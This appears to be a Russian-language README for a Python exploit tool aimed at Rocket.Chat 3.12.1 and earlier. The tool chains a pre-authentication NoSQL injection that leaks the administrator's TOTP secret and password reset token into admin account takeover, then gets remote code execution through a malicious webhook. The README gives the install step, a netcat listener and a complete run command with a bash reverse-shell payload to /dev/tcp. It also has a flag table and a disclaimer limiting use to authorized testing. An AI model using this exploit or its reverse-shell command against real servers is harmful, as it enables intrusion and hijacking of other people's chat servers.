
Эксплуатирует уязвимость NoSQL-инъекции до аутентификации в Rocket.Chat 3.12.1, чтобы раскрыть TOTP-секрет администратора и токен сброса пароля, захватить учётную запись администратора и добиться RCE через вредоносную webhook-интеграцию.
Rocket.Chat <= 3.12.1
pip install -r requirements.txt
Перед запуском эксплойта запустите netcat-слушатель в отдельном терминале, чтобы поймать входящую обратную оболочку:
nc -lvnp 4444
Держите этот терминал открытым. После успешного запуска эксплойта ваша оболочка появится здесь.
python3 pwn_rocketchat.py \
-t 'http://TARGET:3000' \
-u 'USERNAME' \
-p 'PASSWORD' \
-e '[email protected]' \
-a 'adminusername' \
-c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом. Всегда получайте надлежащее письменное разрешение перед тестированием.
| Флаг | Описание |
|---|
-t | URL целевого Rocket.Chat |
-u | Ваше зарегистрированное имя пользователя с низкими правами |
-p | Ваш зарегистрированный пароль пользователя с низкими правами |
-e | Адрес электронной почты администратора |
-a | Имя пользователя администратора |
-c | Команда обратной оболочки |
-v | Подробный режим (показывает необработанные ответы) |